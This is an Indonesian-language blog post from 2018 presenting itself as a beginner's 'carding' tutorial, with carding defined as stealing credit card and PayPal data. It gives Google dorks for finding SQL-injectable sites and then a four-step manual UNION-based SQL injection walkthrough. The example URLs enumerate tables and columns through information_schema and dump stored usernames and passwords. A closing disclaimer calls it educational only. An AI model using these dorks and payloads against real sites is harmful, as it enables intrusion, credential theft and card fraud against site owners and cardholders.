Tutorial Lengkap Cara Carding Manual Untuk Pemula Terbaru 2018 - Wanjay

Tutorial Lengkap Cara Carding Manual Untuk Pemula Terbaru 2018


Tutorial Lengkap Cara Carding Manual Untuk Pemula Terbaru 2018

Tutorial Lengkap Cara Carding Manual Untuk Pemula Terbaru 2018 – Oke gayn kali ini admin akan share artikel tetang cara carding metode manual alias tanpa menggunakan tools seperti havij, sqlmap atau metode scam, tapi dengan cara manual dengan SQL Injection dan juga kepala otak lu sendiri ea akmj ( kalem euy ). Carding adalah suatu metode hacking yang di gunakan untuk mencurry credit card, paypal, dll tindakan ini sangat berdosa gan, buat agan yang masih polos mending jangan sekali-sekali mencoba awto dapat banyak dosa saya Cuma mengingatkan bukan berarti saya tidak memperdulikan hak kebebasan agan.

Baca Juga :
- Cara Mendapatkan SMTP Gratis
- Cara Carding Metode Scampage
- Domain Gratis
- Hosting cPanel Gratis

Dasar-Dasar Carding :


Dork :

Google Dorks adalah salah satu pusat dari Heking. Banyak carder menggunakan Mesin pencari Google untuk menemukan halaman web lemah (Vuln) dan kemudian menggunakan kelemahan ini untuk heking. Yang biasa terdapat dalam Google Dork :

- intitle, mencari judul pada halaman website
- allintitle, masih sama fungsinya untuk mencari judul halaman pada website namun bersifat menyeluruh atau global. 
- inurl, fungsinya untuk mencari string yang terdapat di URL
- allinurl, fungsinya sama mencari string namun bersifat global
- filetype, untuk mencari file yang sangat spesifik
- allintext, fungsinya untuk mencari nilai kata dalam suatu website
- site, mencari sesuatu pada suatu website yang telah di tentukan
- link, mencari keseluruhan link yang berada dalam satu website.

Cara penggunaannya dengan diikuti titik dua (:) setelah dork diatas, lalu diikuti dengan tujuan anda Contoh= "intitle : apa sih google dork itu?" silahkan dikembangkan sesuai kebutuhan anda. (Jadilah Kreatif Coeg Njirr vroh :v !!!)

Web Vuln : Web yang bias digunakan untuk Mencari Data
Cardable Site : Web Shop Online buat Order

CC : Credit Card
PP : Paypal

Baiklah SQL Injection adalah Hacking Website yang memanfaatkan celah atau bug SQL pada database web biasanya masalah ini karna kelalaian admin dan karna error pada syntax SQL nya web tujuan nya adalah agar si Hacker bisa mendapatkan username dan password nya admin.
OK kita ke TKP Dork SQL injection : inurl:/index.php?id= intext: You Have An Error in SQL syntax dork SQL Injection ini ada banyak silahkan cari sendiri di Google, di blog wanjay.com juga ada :P

Berikut saya akan menerangkan SQLinjection dengan 4 langkah.

Tutorial Cara Carding Manual


Yang saya akan bahas disini bagaimana mencari/membaca table serta column dengan cepat... dengan query “group” Concept:
1. mencari nomor togel
2. membaca table
3. membaca column table
4. result
teknik:

1. Mencari nomor togel
saya rasa rekan-rekan sudah tau cara mencari nomer togel... jadi tidak usah saya bahas disini...

example: http://situs.com/index.php?id=-199+union+select+1,2,3,4,5,6,7,8,9,10,11,12--

2. Membaca table
berikut cara query “group” untuk membaca table query yang digunakan sebagai berikut:

group_concat(table_name) code diatas dimasukkan di salah satu nomer togel dan dibelakang url ditambahkan emblem berikut untuk membaca table dalam database: +from+information_schema.tables+where+table_schema=database()-- 

Example: http://situs.com/index.php?id=-199+union+select+1,2,3,4 5, group_concat(table_name),7,8,9,10,11,12+from+information_schema.tables+where+tables_ch ema=database()--
dimana query diatas dimasukkan di nomer togel 6

3. Membaca column table
setelah didapatkan nama table, kita akan membaca column dari table yang kita dapat dengan query sebagai berikut: group_concat(column_name)
dan emblem yang disertakan pada belakang url sebagai berikut ini: +from+information_schema.columns+where+table_name=CODE EQUIVALENT HEX VALUE Table Dimana “CODE EQUIVALENT HEX VALUE Table” didapatkan dari convert “STRING EQUIVALENT HEX VALUE” Dan saya biasa menggunakan tools berikut: http://xshadow-power.com/tools Dan pada gambar sebelumnya... table yang akan kit baca columnya adalah “muser” dan telah didapatkan dari hasil confert dari muser adalah 0x6D75736572

Example: http://situs.com/index.php?id=-199+union+select+1,2,3,4 5, group_concat(table_name),7,8,9,10,11,12+from+information_schema.tables+where+tables_ch ema=database()-- dimana query diatas dimasukkan di nomer
Example: http://situs.com.php?id=-199+union+select+1,2,3,4 5,group_concat(column_name),7,8,9,10,11,12 +from+information_schema.columns+where+table_name=0x6D75736572--

Result :

setelah mendapatkan apa yang kita cari pada langkah 2 & 3 diatas... sa’atnya membaca ISI dari column dari table muser yaitu “uid,pass” query yang digunakan sebagai berikut: concat_ws(nama column yang akan dibaca) dan ditambahkan emblem dibelakang url sebagi berikut +from+nama column table yang akan dibaca--

Example : http://situs.com/index.php?id=- 1107+union+select+1,2,3,4,5,concat_ws(0x3a,uid,pwd),7,8,9,10,11,12+from+muser--

Nah maka username dan password nya akan muncul

Sekian Tutorial kali ini semoga bermanfaat untuk hal kebaikan, tutorial ini hanya untuk pembelajaran saja hal-hal negative yang akan terjadi admin tidak bertanggung jawab. terima kasih sudah berkunjung


Berlangganan update artikel terbaru via email:

Klik Untuk Berkomentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel